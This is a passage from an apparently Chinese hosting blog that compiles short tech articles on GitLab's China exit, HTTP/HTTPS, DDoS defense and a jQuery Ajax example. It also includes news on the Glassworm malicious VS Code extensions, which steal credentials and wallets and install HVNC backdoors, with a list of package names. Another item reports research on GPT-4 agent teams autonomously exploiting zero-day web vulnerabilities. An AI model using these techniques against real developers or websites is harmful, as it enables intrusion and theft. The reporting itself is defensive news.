账户服务。受影响的用户被建议将他们的账户迁移到名为"极狐GitLab"(JiHu)的新平台上,这个新平台是根据GitLab授权运营的独立公司。GitLab.com 将会为用户提供60天的迁移期,在这段时间内,用户需要完成从GitLab.com至极狐GitLab的账户迁移。过渡期结束后,未完成迁移的账户可能会被 GitLab.com 删除。出 目前大陆IP访问现GitLab.com会显示以下界面: 我们的系统显示您正在从这些位置之一访问 GitLab。我们建议您注册极狐 https://gitlab.cn/saasmigration/ 。极狐是一家独立公司,提供本地化的 GitLab 产品,并拥有向该地区的个人和组织提供 GitLab 的独家权利。您必须在 2025 年 2 月 18 日之前完成迁移,之后 GitLab 将从我们的系统中删除您的帐户(You must complete the transition by 18-02-2025, after which GitLab will delete your account from our systems.)。如果您认为收到此通知有误,请从受支持的服务位置登录 GitLab.com。如需更多信息或支持,请随时联系 saasmigration@gitlab.cn。此致,GitLab 团队 至于为什么停止为中国区提供服务,主机帮猜测应该是跟国内的数据安全法有关。 #### Glassworm恶意软件第三波攻击瞄准VS Code生态,24个恶意扩展包上架官方市场 12月2日,安全机构Secure Annex研究员John Tuckner披露,针对Visual Studio Code扩展生态的Glassworm恶意软件已发起第三轮攻击。攻击者近期在Microsoft Visual Studio Marketplace及OpenVSX两大官方平台上投放了24个新增恶意扩展包,伪装成Flutter、React Native、Vue等主流开发工具,进一步威胁开发者账户与系统安全。 攻击手法持续升级本次攻击延续了此前利用“隐形Unicode字符”绕过代码审查的策略,并在技术层面引入由Rust语言编写的植入程序,增强反分析能力。运营上,攻击者采取“先上架后投毒”模式:扩展包通过审核后,再通过更新推送恶意代码,并配合刷量手段提升搜索排名,使其紧邻正版工具出现,极具迷惑性。 高度危险的攻击链一旦开发者误装恶意扩展,攻击将立即启动,执行以下操作: 窃取GitHub、npm及OpenVSX账户凭据; 扫描并窃取本地加密货币钱包数据; 部署SOCKS代理以路由恶意流量; 安装HVNC(隐藏虚拟网络计算)客户端,实现隐蔽的远程控制,为后续渗透留下后门。 恶意包列表与仿冒策略恶意包命名故意与热门工具相似,例如 icon-theme-materiall(仿官方Material Icon Theme)、prettier-vsc(仿Prettier代码格式化工具)等,极易诱骗开发者下载。以下为部分被确认的恶意包名称: VS Marketplace 示例: prisma-inc.prisma-studio-assistance flutcode.flutter-extension vims-vsce.vscode-vim msjsdreact.react-native-vscode OpenVSX 示例: tailwind-nuxt.tailwindcss-for-react yamlcode.yaml-vscode-extension vitalik.solidity 安全建议开发者在安装扩展时应: 仔细核对发布者名称与包名,警惕仿冒拼写; 优先选用下载量大、维护活跃的正版扩展; 定期审计已安装扩展,移除非必要或可疑项目; 在关键开发环境中启用安全扫描工具。 此次攻击表明,恶意软件正持续瞄准开源与开发者基础设施,利用生态信任进行供应链投毒。相关平台需加强扩展审核机制,开发者也应提高对仿冒扩展的辨识能力,共同维护开发环境安全。 #### Google 的「.new 短网址」快捷方式将会开放给第三方网站使用 11 月 1 日消息:早在一年前 Google 就为 Google 文档、幻灯片和表格等自家服务引入了方便的「.new」短网址快捷方式,用户可直播通过在浏览器的地址栏中键入「docs.new」等相应地址,然后就会在其中打开一个对应的新的 G Suite 文档。 SIMFEROPOL, RUSSIA - NOVEMBER 22, 2014: Photo shoot of Google logotype on a keyboard button. Google is an American multinational corporation specializing in Internet-related services and products 现在谷歌通过官方博客宣布,将再多提供 10 个 .new 短网址快捷方式,功能包括可以创建新 Spotify 歌单(Playlists.new)、创建新 Medium 文章(Story.new),创建新的 Google 日历活动(Cal.new)等网络服务。 另外,谷歌宣布这一 .new 短网址将在 12 月 2 日开放给公众申请使用,明年 1 月 14 日开始接受版权持有人申请已注册版权的域名。并且 Google 要求相关网站需要有 HTTPS 加密保护才可以。 #### GPT-4 可自主利用“零日”漏洞攻破网站 成功率达 53% 6月9日,NewAtlas报道了一项突破性研究,其中研究人员利用GPT-4驱动的自主协作机器人小组,成功渗透了超过一半的测试网站。令人震惊的是,这些机器人不仅能够自主协调行动,还能够根据需求生成新的“帮手”,利用的还是未公开的零日漏洞。 早期研究回顾 数月前,这些研究人员已在一篇论文中展示了GPT-4的能力,它能够自动利用业界已知但未修复的“N day”漏洞。实验显示,GPT-4能够仅凭已知的CVE列表,自主利用87%的严重级别漏洞。 零日漏洞的新突破 本周,该团队发布了新的研究成果,宣布他们已经能够利用零日漏洞——那些尚未被世界所知的漏洞。他们采用了“任务特定智能体分层规划”(HPTSA)的方法,通过一群大型语言模型(LLM)的协同作战,实现了这一壮举。 HPTSA方法:智能体的协同与分工 与以往单个LLM尝试解决所有复杂任务的方式不同,HPTSA方法引入了“规划智能体”,它负责监督整个过程,并衍生出多个针对特定任务的“子智能体”。这种类似老板与下属的分工方式,有效地减轻了单个智能体在面对复杂任务时的负担。 实验结果:高效率与成功率 在对15个真实网络漏洞的测试中,HPTSA方法在利用漏洞方面的效率比单个LLM高出550%,成功率达到了53%,成功利用了8个零日漏洞,而单个LLM仅利用了3个。 道德与法律框架内的使用 研究人员之一丹尼尔・康(Daniel Kang)强调,虽然存在对这些模型被恶意使用的担忧,但GPT-4在聊天机器人模式下并不足以理解LLM的能力,本身无法进行攻击。当被NewAtlas编辑询问是否能利用零日漏洞时,GPT-4明确表示其不能利用零日漏洞,并强调其目的是在道德和法律框架内提供信息和帮助,同时建议咨询网络安全专业人士。 这项研究不仅展示了人工智能在网络安全领域的潜力,同时也提醒我们,随着技术的发展,必须确保其在正确的轨道上,用于正当和道德的目的。百度云防护等安全解决方案将继续在这一领域发挥关键作用,保护我们的数字世界免受侵害。 #### H&M因抵制新疆产品在国内凉了,目前淘宝已经搜索不到 还是淘宝下手快,目前HM关键词搜索已经搜索不到任何东西了,赞一个! H&M是Erling Persson于1947年在瑞典创立的服饰品牌。H&M在全世界1500 多个专卖店销售服装、配饰与化妆品,在亚洲或许很少被提及,但是在欧洲却是名气不小。2018年12月,H&M入围2018世界品牌500强,位列第83,可见其实力不小,没想到却发表这类言论,实在是作死,主机吧所在的城市也有一家H&M专卖店,此次这番言论着实坑了国内加盟商,但是国内从来不缺服装品牌。   #### H5的API调用被CC攻击了 要怎么防御 HTML5(H5)的 API 调用被 CC 攻击是指恶意攻击者利用程序自动化工具来模拟大量的 API 请求,以达到耗尽服务器资源的目的。以下是一些可以防御 H5 的 API 调用被 CC 攻击的方法: 限制 API 访问频率:可以通过限制每个 IP 地址的 API 访问频率来减少 CC 攻击的影响。例如,可以设置 API 请求的最大速率,以确保没有任何单个 IP 地址超过允许的速率。 实现访问控制列表:可以在服务器上实现访问控制列表(ACL),限制只有已授权的 IP 地址才能够访问 API,从而减少恶意攻击者的影响。 使用 WAF 进行防护:可以使用 Web 应用程序防火墙(WAF)来过滤掉恶意请求。WAF 可以检测和过滤掉异常请求,从而保护 API 调用不受 CC 攻击的影响。 使用验证码:可以在 API 调用前实现验证码,以确保只有真正的用户才能访问 API。验证码可以有效地防止自动化程序发起的恶意攻击。 加强日志监控:通过日志监控,可以及时发现异常请求,并采取必要的措施防止恶意攻击。可以使用工具来分析和监控 API 请求日志,以便更好地了解系统的行为。 加强服务器安全:可以加强服务器的安全性,例如更新系统补丁、限制服务权限等,以减少被攻击的风险。可以使用防火墙和安全软件等工具,帮助保护服务器免受恶意攻击。 验证请求来源:可以验证请求的来源,以确保只有经过身份验证的请求才能访问 API。可以使用令牌或 API 密钥等方式来验证请求。 使用 CDN:可以使用内容分发网络(CDN)来分散流量,减轻服务器的负载。CDN 可以帮助缓存静态内容,并从离用户更近的服务器提供服务。 分布式服务器:可以使用分布式服务器来分散流量,从而减轻服务器的负载。这样,即使一台服务器被攻击,也可以使用其他服务器继续提供服务。 加强网络安全:可以加强网络安全,例如使用 SSL/TLS 加密通信、限制端口访问等。这可以有效地减少恶意攻击者的影响。 总之,防御 H5 API 被 CC 攻击需要采取多种措施,包括限制访问频率、实现访问控制列表、使用 WAF 进行防护、加强服务器和网络安全等。 #### H5网址如何防御DDOS攻击 HTML5 (H5) 是用于构建 Web 页面和应用程序的标准化技术,并不直接涉及网络攻击和安全问题。而 DDoS 攻击是一种网络攻击方式,通过向目标服务器发送大量流量,使其无法正常工作。 虽然 H5 技术本身并不涉及 DDoS 攻击,但是网站或应用程序使用 H5 技术并部署在 Web 服务器上,则可能成为 DDoS 攻击的目标。攻击者可以利用 H5 页面或应用程序中存在的漏洞或脆弱性来发动攻击,或者直接针对 Web 服务器发动攻击。 以下是一些可以防御 H5 被 DDoS 攻击的方法: 使用 CDN(内容分发网络):CDN 可以将静态资源缓存到多个服务器上,可以帮助分散攻击流量并降低服务器负载,从而减少被攻击的风险。 使用 WAF(Web 应用程序防火墙):WAF 可以检测和过滤掉恶意流量,并防止攻击者利用 Web 应用程序中的漏洞来发动攻击。 使用负载均衡器:负载均衡器可以将流量分配到多个服务器上,从而提高系统的可用性和抗攻击能力。 增强服务器的硬件配置:使用更高级别的硬件设备,例如更大的带宽、更高的内存容量和更快的 CPU,可以增强服务器的处理能力,从而更好地承受 DDoS 攻击。 升级软件版本:经常升级 Web 服务器的软件版本可以修复漏洞和弱点,从而减少被攻击的风险。 加强访问控制:可以采用访问控制列表(ACL)或其他安全机制来限制对服务器的访问,防止攻击者利用未经授权的访问来发动攻击。 监控网络流量:可以使用流量分析工具来监控网络流量,并快速识别异常流量和攻击流量。 需要注意的是,没有一种单一的解决方案可以完全消除 DDoS 攻击的威胁。最佳做法是采用多种方法来提高服务器的安全性和抗攻击能力。 主机吧推荐使用云防火墙来进行防御: 百度云加速 百度云加速是百度旗下为网站提供一站式加速、安全防护和搜索引擎优化的产品。提供四到七层的DDoS攻击防护,包括CC、SYN flood、UDP flood等所有DDoS攻击方式, 通过分布式高性能防火墙+精准流量清洗+CC防御+WEB攻击拦截,组合过滤精确识别,有效防御各种类型攻击。 优惠链接https://zhujib.com/yunjiasu.html 京东云星盾SCDN 京东云星盾SCDN安全加速(SCDN,Secure Content Delivery Network),是京东云推出的一体化分布式安全防御产品,提供免费 SSL 证书,集成 Web 攻击防护、CC 攻击防御、BOT 机器人分析,并将内容分发加速能力融于一身。在边缘节点注入安全能力,形成分布式的安全加速网络,让您的业务更安全、体验更流畅。适用于所有兼顾安全和内容加速的业务。 优惠链接:https://zhujib.com/jdxingdun.html #### Hadoop 管理工具 Apache Ambari 无人愿意开发即将退役 1 月 18 日消息,Apache Ambari 是一个基于 Web 的 Apache Hadoop 集群的供应、管理和监控工具,曾是 Apache Software Foundation 的顶级项目。 近日,Apache Ambari 的开发者之一 Jayush Luniya 提议将该项目的开发搁置,原因是大部分提交者和 PMC 成员没有积极参与该项目,过去两年来,只发布了 Ambari 2.7.6 这一个版本。 Jayush Luniya 发布了一个 72 小时的投票,如果同意项目退役,就回复 +1。目前该投票已获得全票通过。 据了解到,该项目尚未出现在退役名单中,不过预计很快就将正式退役。 Ambari 已支持大多数 Hadoop 组件,包括 HDFS、MapReduce、Hive、Pig、 Hbase、Zookeeper、Sqoop 和 Hcatalog 等,其提供了一个直观、易于使用的 Hadoop 管理 Web UI,由其 RESTful API 提供支持。 #### HBuilderX:一款非常强大的国产免费网页编辑器 HBuilderX是一款类似于Adobe Dreamweave的网页编辑器,非常强大,也成非常符合国人的操作习惯,主机吧之所有知道这个软件都是因为朋友推荐的,一但用上就爱不释手了,感觉比Dreamweave还好用,推荐大家使用! HX的特点 1. 轻巧 仅10余M的绿色发行包(不含插件) 2. 极速 不管是启动速度、大文档打开速度、编码提示,都极速响应 C++的架构性能远超Java或Electron架构 3. vue开发强化 `HX`对vue做了大量优化投入,开发体验远超其他开发工具 [详见](https://ask.dcloud.net.cn/article/19601) 按下Alt+鼠标左键可直接打开网址 4. 小程序支持 国外开发工具没有对中国的小程序开发优化,`HX`可新建`uni-app`或`小程序`、`快应用`等项目,为国人提供更高效工具 5. markdown利器 `HX`是唯一一个新建文件默认类型是markdown的编辑器,也是对md支持最强的编辑器 `HX`为md强化了众多功能,请**务必点击**【菜单-帮助-markdown语法示例】,快速掌握md及`HX`的强化技巧! 6. 清爽护眼 HX的界面比其他工具更清爽简洁,绿柔主题经过科学的脑疲劳测试,是最适合人眼长期观看的主题界面 [详见](https://ask.dcloud.net.cn/article/35112) 7. 强大的语法提示 `HX`是中国唯一一家拥有自主IDE语法分析引擎的公司,对前端语言提供准确的代码提示和转到定义(Alt+鼠标左键) 8. 高效极客工具 更强大的多光标、智能双击...让字处理的效率大幅提升 了解`HX`的极客技巧,[详见](https://ask.dcloud.net.cn/article/13191), 9. 更强的json支持 现代js开发中大量json结构的写法,`HX`提供了比其他工具更高效的操作 [详见](https://ask.dcloud.net.cn/article/13526)   官方下载地址:https://www.dcloud.io/hbuilderx.html #### HTML页面局部刷新的实现代码 事件响应刷新:有请求才会刷新1、通过JS HTML DOM或jQuery获取HTML元素,通过DOM方法或jQuery方法监听页面事件,获取用户请求;2、通过Ajax将用户请求提交至服务器,服务器处理后返回结果,再由Ajax接收数据;3、通过DOM方法或jQuery方法将数据载入页面,事件响应刷新完成。$('#input_date').keypress(function(e){     if(e.keyCode=='13'){       $.ajax({         type: "POST",         url: "inquire_date.php",         data: {           birth:null,   //1.获取用户请求(即某些事件),发送到服务器处理           date:$('#input_date input').val()         },         dataType: "json",   //2.从服务器获取数据         success: function(data){           if (data.success) {             var festival = data.fetivalInquireResult;   //3.将获取的数据载入页面,实现页面事件响应刷新             $('#show_festival').text(festival);           } else {             $('#show_festival').text("获取节日失败");           }          },         error: function(jqXHR){               alert("发生错误:" + jqXHR.status);        },           });     $('#festival').hide();     $('#response_festival').show();     }   }); 局部自动刷新:没有请求局部页面也会自动刷新1、通过定时器函数如setTimeout(),让Ajax每隔一段时间从服务器获取数据;2、通过DOM方法或jQuery方法将数据载入页面,实现页面局部自动刷新。$(document).ready(function(e){       setTimeout('updateShow()',0);   });   /*局部自动刷新页面数据*/   function updateShow(){     $.ajax({       type: "GET",       url: "inquire_date.php?data=" + "inquire",       dataType: "json",   //1.通过定时器定时从服务器获取数据       success: function(data) {         if (data.success) {           var agesFormat = data.agesFormat;           var daysFormat = data.daysFormat;   //2.将数据载入页面,实现自动刷新           $('#ages').text(agesFormat);            $('#days').text(daysFormat);         } else{           alert("获取数据失败");         }       },       error: function(jqXHR){             alert("发生错误:" + jqXHR.status);        },     });     setTimeout('updateShow()',500);   } 以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持主机吧。 #### HTTP/2与HTTP/3的优势对比 HTTP/2 和 HTTP/3 都是对传统 HTTP/1.x 协议的重大改进,旨在提升网络性能、效率和安全性。以下是它们的主要优势对比: HTTP/2 的核心优势 多路复用 (Multiplexing) 允许在单个 TCP 连接上同时传输多个请求和响应,避免了 HTTP/1.1 的队头阻塞(Head-of-Line Blocking)。 显著减少延迟,提升页面加载速度(尤其对资源密集的网站)。 头部压缩 (HPACK) 使用 HPACK 算法压缩 HTTP 头部,减少冗余数据(如 Cookie、User-Agent 等重复字段)。 降低带宽开销,提升传输效率。 二进制协议 取代 HTTP/1.x 的文本格式,改用二进制帧(Frames)传输数据。 解析更高效,减少错误,兼容性更好。 服务端推送 (Server Push) 服务端可主动向客户端推送资源(如 CSS、JS),无需等待客户端请求。 减少额外请求延迟,提升页面渲染速度。 流优先级 (Stream Prioritization) 允许为不同资源分配优先级(如优先加载 HTML 而非图片)。 优化关键资源的加载顺序。 HTTP/3 的核心优势(基于 QUIC 协议) HTTP/3 的最大变革是将底层传输协议从 TCP 替换为 QUIC(基于 UDP),解决 TCP 的固有瓶颈: 彻底解决队头阻塞 QUIC 在传输层实现多路复用,每个数据流(Stream)独立传输。 即使某个流丢包,也不影响其他流(HTTP/2 在 TCP 层仍可能因丢包阻塞所有流)。 更快的连接建立 0-RTT 握手:对曾经连接的服务器,首次请求可跳过 TLS 握手,大幅减少延迟。 1-RTT 完成首次连接(TCP + TLS 通常需 2-3 RTT)。 无缝的网络切换 QUIC 使用连接标识符(Connection ID),在切换网络(如 WiFi 转 4G)时保持连接不断开。 TCP 依赖 IP 和端口,网络切换需重新连接。 改进的拥塞控制 QUIC 在用户空间实现拥塞控制算法(如 BBR),迭代更灵活。 减少延迟,提升弱网环境(如高丢包率)的性能。 原生加密 QUIC 默认强制使用 TLS 1.3 加密,安全性更高。 减少中间设备(如路由器)的干扰。 对比总结 特性HTTP/2HTTP/3 (QUIC)传输协议TCPUDP + QUIC队头阻塞应用层解决(TCP 层仍存在)彻底解决(传输层独立流)连接建立速度1-2 RTT(含 TLS)0-1 RTT(支持 0-RTT)网络切换支持不支持支持(Connection ID)加密可选(主流强制 TLS)强制 TLS 1.3弱网环境性能一般显著优化(高丢包场景)部署复杂度中等(需服务器/浏览器支持)较高(需更新网络基础设施) 使用建议 HTTP/2:已在全球广泛部署(>50% 的网站),兼容性好,适合大多数场景。 HTTP/3:逐步普及(Cloudflare、Google 等已支持),在移动网络、高延迟或丢包环境下优势明显,是未来方向。 总结:HTTP/2 通过多路复用和头部压缩优化了 HTTP/1.x 的瓶颈;HTTP/3 则通过 QUIC 协议重构传输层,解决了 TCP 的固有问题,尤其适合现代互联网的高移动性和弱网环境。两者都显著提升了用户体验,推动 Web 向更高效、安全的方向演进。 #### HTTP/3的好处与测试是否支持HTTP/3 HTTP/3 是超文本传输协议(HTTP)的最新版本,它引入了一些显著的优点和改进。以下是 HTTP/3 的一些主要好处: 更快的连接建立: HTTP/3 使用 QUIC(Quick UDP Internet Connections)作为底层传输层协议,而不是传统的 TCP。QUIC 通过减少握手次数来加快连接建立速度。 它支持零往返时间(0-RTT)的连接复用,允许在没有额外延迟的情况下发送数据。 多路复用与并行性: 在一个单一的 QUIC 连接上可以处理多个独立的数据流,从而减少了对网络资源的需求,并提高了性能。 多路复用意味着请求和响应可以在同一个连接上交错进行,而不需要为每个请求都创建一个新的连接。 更好的错误恢复: 如果一个数据包丢失或损坏,QUIC 能够只重传受影响的数据包,而不必重传整个数据流。 这种机制降低了丢包带来的延迟和带宽浪费。 加密默认开启: 所有 QUIC 数据包都是加密的,这增强了安全性,并且有助于防止中间人攻击和流量分析。 更少的头部开销: HTTP/3 改进了头部压缩算法,从而减小了请求和响应头部的大小,节省了网络带宽。 更高效的拥塞控制: QUIC 提供了一套新的拥塞控制算法,可以根据网络条件动态调整数据传输速率。 无缝切换网络: 当设备从 Wi-Fi 切换到移动数据或其他网络时,QUIC 可以保持连接并自动重新协商路径,使得用户几乎感觉不到中断。 可扩展性: HTTP/3 和 QUIC 都是高度模块化和可扩展的,这意味着未来可以通过添加新特性来增强它们的功能。 改善 Web 性能: 因为减少了延迟和提高了效率,HTTP/3 可以为用户提供更快的加载时间和更流畅的浏览体验。 总之,HTTP/3 是一种旨在提高 Web 性能、安全性和可靠性的下一代通信协议。随着越来越多的浏览器和服务器开始支持 HTTP/3,这些优势将逐渐普及到互联网的各个角落。 要测试一个网站是否支持 HTTP/3,你可以通过以下方法进行: 使用在线工具: 使用如 http3check.net 这样的在线工具。这些工具通常会自动检测你访问的网站是否支持 HTTP/3,并显示结果。 在输入框中输入你想测试的网址,然后点击“Check”或类似的按钮。 浏览器检查: 如果你的浏览器支持 HTTP/3(例如最新版本的 Chrome、Firefox 或 Safari),你可以直接查看开发者工具中的网络请求信息来确定是否使用了 HTTP/3。 要打开开发者工具,请按 F12 或右键单击页面并选择“检查”,然后转到“网络”或“网络”选项卡。 浏览器会在每个网络请求旁边显示所使用的协议,如果看到 "h3" 或 "HTTP/3" 的字样,就表示该请求使用了 HTTP/3。 命令行工具: 你可以使用命令行工具如 curl 来测试 HTTP/3 支持。 使用 -H 参数设置 Alt-Svc 请求头以启用 HTTP/3,例如: shcurl -v --http3 https://example.com 如果服务器支持 HTTP/3,你应该能够看到相应的响应和返回数据。 手动配置客户端: 对于某些高级用户,可以尝试手动配置客户端(如 curl 或其他程序)来支持 HTTP/3。 这可能需要更新软件版本、安装特定的库以及调整连接参数。 阅读服务器文档: 如果你是服务器管理员,可以通过查阅服务器软件的文档来了解如何启用和支持 HTTP/3。 对于流行的 Web 服务器,如 Nginx 和 Apache,有详细的指南可以帮助你设置 HTTP/3。 请记住,即使服务器支持 HTTP/3,也需要客户端也支持它才能建立连接。如果你的设备不支持 HTTP/3,你将无法体验其优点。 #### HTTPS 证书可能有效期最长缩短至13 个月 由 Web 浏览器制造商、软件开发人员和安全证书颁发机构组成的行业团体 CA/Browser Forum,正在考虑将 HTTPS 证书的有效期从 27 个月缩短到 13 个月。 关于这样的提案,已经不是第一次提出。在 2017 年时,CA/Browser Forum 就否决了一项将证书有效期从 39 个月缩短至 13 个月的提案。 而早在一年前,证书的最长有效期已经从 39 个月降至 27 个月。 我们都知道,HTTPS 证书用于加密浏览器和站点之间的连接,帮助软件确定没有人篡改或窃听这些连接。 如果减少 TLS/SSL 证书有效的时间,网站必须更频繁地更新其证书。理论上,这样的证书有效期也有助于减少欺诈活动,如果是偷来的证书则很快会失效,被遗弃的网站也会更快地过期。这将迫使他们使用最新和最推荐的加密和散列证书,而不是使用不安全算法的老化证书。 不过,本周一时,DigiCert 的 Timothy Hollebeek 却反对将证书有效期缩短至 13 个月,他认为,缩短证书寿命确实带来的好处,但意味着要有更好的方法来确保证书是最新的和安全的,同时也存在一些麻烦,企业不得不每年续签一次付费证书,并且增加其成本。 换句话说,减少有效期可能会促使企业免费使用 Let's Encrypt TLS/SSL,就不会向 Digicert 这样的机构支付费用。Let's Encrypt 可以免费发放 90 天的 HTTPS 证书,使用提供的软件客户端来自动更新和部署证书,而由于几乎所有浏览器和操作系统都支持 Let's Encrypt TLS/SSL 证书,导致该服务正给向 HTTPS 证书收费的证书颁发机构带来巨大压力。 Hollebeek 称: 将证书寿命迅速缩短到一年,甚至更少,对于许多依赖数字证书保护系统的公司来说,这将带来巨大的成本。这些费用不会换来更加安全的改进,并且这项提案对从事非法活动或冒充合法公司的非法分子不会有任何影响。最主要的一点是,减少证书寿命的任何好处都是属于理论性的,在短期内要付诸实际的话,产生的风险和成本也将难以预测。 该提案于今年早些时候在谷歌员工 Ryan Sleevi 的一次会议上提出,目前仍处于草案阶段,还没有关于何时进行表决的消息。 #### HTTPS和HTTP有什么区别 部署HTTPS有什么影响 HTTPS和HTTP的区别 HTTP(超文本传输协议) 是互联网上应用最为广泛的协议之一,用于从网站传输超文本到本地浏览器的传输协议。它定义了客户端与服务器之间请求和响应的格式。 HTTPS(安全超文本传输协议) 是HTTP的安全版本,其主要区别在于: 加密:HTTPS在HTTP的基础上加入了SSL/TLS协议,SSL/TLS协议提供了数据加密、完整性校验和身份验证机制,保护数据传输过程中的安全性。 端口:HTTP默认使用80端口,而HTTPS默认使用443端口。 安全性:HTTPS提供了更强的安全性,可以防止数据在传输过程中被窃听或篡改。 证书:部署HTTPS需要使用SSL/TLS证书,这是一种数字证书,用于验证服务器的身份,并为浏览器和服务器之间的通信加密。 部署HTTPS的影响 安全性提升: 数据加密:HTTPS通过SSL/TLS加密数据,保护用户数据不被窃取或篡改。 防止中间人攻击:通过验证服务器身份,HTTPS可以防止中间人攻击,确保用户连接的是真实的服务器。 搜索引擎优化(SEO): 搜索引擎如谷歌已经明确表示,使用HTTPS的网站在搜索结果中的排名会更高。 用户信任: 浏览器会通过锁形图标等视觉提示来告诉用户他们的连接是安全的,这可以增加用户对网站的信任。 兼容性: 随着互联网安全意识的提高,越来越多的浏览器和平台要求或推荐使用HTTPS。 性能开销: HTTPS相比于HTTP会有一定的性能开销,因为加密和解密数据需要额外的计算资源。不过,随着现代硬件和协议优化,这种性能差异已经变得非常小。 成本: 部署HTTPS需要购买和维护SSL/TLS证书,这会带来一定的成本,尽管有许多免费证书提供商(如Let's Encrypt)。 混合内容问题: 如果网站同时使用HTTP和HTTPS,可能会导致混合内容问题,即页面通过HTTPS加载,但页面中的某些资源通过HTTP加载,这会降低页面的安全性。 浏览器要求: 现代浏览器对HTTPS的支持越来越好,一些浏览器甚至开始标记没有使用HTTPS的网站为不安全。 总的来说,部署HTTPS对于提升网站的安全性、增强用户信任、提高搜索引擎排名等方面都有积极的影响,尽管可能会带来一些额外的成本和性能开销。随着技术的发展和互联网安全意识的提高,HTTPS已经成为网站部署的标配。 #### https网站安全证书提示已过期怎么办? 随着网络信息安全的重要性愈演愈烈,https加密的网站也越来越多,但有时候访问某些https网站的时候,偶尔会遇到浏览器提示"此网站的安全证书有问题"以及"此网站出具的安全证书已过期或还未生效",同时浏览器的地址栏的绿色安全锁也没有出现,https链接被划上了一条斜红线,这到底是怎么回事呢?下面就随小编一起来分析一下如何处理。 网站https安全证书过期原因分析: 1、当前电脑系统时间错误,所有的http安全证书都有颁发日期和截止日期,电脑系统时间在证书有效时间区间之外有可能导致浏览器提示网站https安全证书已过期或还未生效。 2、网站的https安全证书确实已经过期,根据https安全证书签发国际标准,https安全证书颁发不能超过39个月。 3、站点引用其它部署了https安全证书的外链,如果这个外链的证书过期了也会提示相应的错误。 能检测出外链有证书错误的终端设备有:手机浏览器、PC端IE6 (IE6以上的不提示)。 网站https安全证书过期的解决方法: 1、 电脑系统时间不对:将电脑系统的时间调整至https安全证书有效期之内。 2、 https安全证书过期:需要网站所有者到https安全证书签发机构CA续签证书。 3、 当前站点外链网站的https证书过期:需要网站所有者撤销外链或者外链网站所有者到CA机构替换或续费证书。 注意,除了以上的情况之外,浏览器对存在下面几种情况的https网站也会提示风险。 1、使用自签名https证书 部分网站采用了自签名https证书来为网站实施加密,事实上自签名https证书不但不被浏览器信任,并且还存在较大安全风险。 2、使用通用性不好的https证书 使用通用性不好的https证书,会导致某些浏览器不信任,比如某CA机构签发的https证书不受谷歌和火狐浏览器的信任。当你用谷歌或者火狐浏览器访问到部署了这类https证书的网站时会被提示风险。 3、https证书没有正确部署 如果网站的https证书没有正确的部署,在访问网站的时候也会被浏览器提示风险,比如https页面中存在http资源的调用,部分版本的浏览器会提示该页面存在不安全因素。这时只需要将这些http调用资源改为https调用即可解决。 #### HTTP与HTTPS的区别 如何把http变成https HTTP 和 HTTPS 的区别 HTTP(超文本传输协议)和 HTTPS(安全超文本传输协议)是用于在互联网上传输数据的两种不同协议,它们的主要区别在于安全性。 安全性:HTTPS 是 HTTP 的安全版本,它在数据传输过程中加入了加密层,以保护数据免受中间人攻击和窃听。HTTP 传输的数据是明文的,容易被拦截和解析,而 HTTPS 通过使用 SSL/TLS 协议来加密数据,确保了数据的私密性和完整性。 端口:HTTP 默认使用端口 80,而 HTTPS 默认使用端口 443。这意味着当您在浏览器中输入一个 HTTPS URL 时,它会自动连接到服务器的 443 端口。 性能:由于 HTTPS 需要进行额外的加密和解密操作,它的性能通常比 HTTP 慢。HTTPS 的连接建立过程包括多个步骤,如 SSL/TLS 握手,这可能会导致页面加载时间略微延长。 证书:HTTPS 要求服务器提供一个由可信第三方机构签发的 SSL 证书,以便客户端可以验证服务器的身份。这个证书包含了公钥,以及由证书颁发机构(CA)签名的信息,用以证明证书的合法性。 兼容性和搜索引擎优化:随着互联网安全意识的提高,许多现代浏览器和搜索引擎都倾向于优先考虑 HTTPS 网站。例如,Google 会给予 HTTPS 网站更高的排名权重,并且在地址栏显示绿色的锁标志,以表明网站的安全性。 综上所述,HTTPS 提供了比 HTTP 更高级别的安全保障,尤其适合处理敏感信息,如在线购物、银行业务和个人隐私数据。然而,由于其额外的安全措施,HTTPS 的性能可能会稍逊于 HTTP。 要将HTTP转换为HTTPS,你需要遵循以下步骤: 1. 获取SSL证书 首先,你需要获取一个SSL证书。这个证书可以从一些知名的证书颁发机构(CA)购买,也可以从一些提供免费证书的机构获取。例如,百度云、腾讯云、阿里云等都提供免费的SSL证书,当然也有收费的SSL证书。 2. 安装证书 获取到证书后,你需要在你的服务器上安装这个证书。不同的服务器软件可能需要不同的安装方法。例如,如果你使用的是Apache服务器,你可能需要编辑conf/httpd.conf文件,然后去掉#LoadModule ssl_module modules/mod_ssl.so和#Include conf/extra/httpd-ssl.conf前的注释符号,然后在conf/extra/httpd-ssl.conf文件中配置你的证书文件和私钥文件的路径。 3. 配置服务器 接下来,你需要配置你的服务器以使用HTTPS。这一步的具体操作取决于你使用的服务器软件和操作系统。例如,如果你使用的是Nginx服务器,你可以在Nginx的配置文件中设置listen 443 ssl;,并且指定你的证书文件和私钥文件的路径。 4. 重定向HTTP请求 最后,为了确保所有的用户都能通过HTTPS访问你的网站,你需要将所有的HTTP请求重定向到HTTPS。这一步可以通过在服务器配置文件中添加一个服务器块,并使用rewrite ^(.*) https://$host$1 permanent;来实现。 以上就是将HTTP转换为HTTPS的大致步骤。需要注意的是,这个过程可能会因为具体情况有所不同,具体还需要根据你的服务器环境和配置来进行调整。 #### HTTP服务器状态代码百科解析 做网站的时候,服务器访问经常会遇到各种各样的状态码,比如我们常见的502,500错误等,很多人不明白什么意思,今天我们主机吧为大家解析下服务器各状态码的定义,以方便大家对正解决问题。 HTTP服务器状态代码定义(Status Code Definitions) 1.1 消息1xx(Informational 1xx) 该类状态代码用于表示临时回应。临时回应由状态行(Status-Line)及可选标题组成, 由空行终止。HTTP/1.0中没有定义任何1xx的状态代码,所以它们不是对HTTP/1.0请求的 合法回应。实际上,它们主要用于实验用途,这已经超出本文档的范围。 1.2 成功2xx(Successful 2xx) 表示客户端请求被成功接收、理解、接受。 200 OK 请求成功。回应的信息依赖于请求所使用的方法,如下: GET 要请求的资源已经放在回应的实体中了。 HEAD 没有实体主体,回应中只包括标题信息。 POST 实体(描述或包含操作的结果)。 201 Created 请求完成,结果是创建了新资源。新创建资源的URI可在回应的实体中得到。原始服务器应在发出该状态代码前创建该资源。如果该操作不能立即完成,服务器必须在该资源可用时在回应主体中给出提示,否则,服务器端应回应202(可被接受)。 在本文定义的方法,只有POST可以创建资源。 202 Accepted 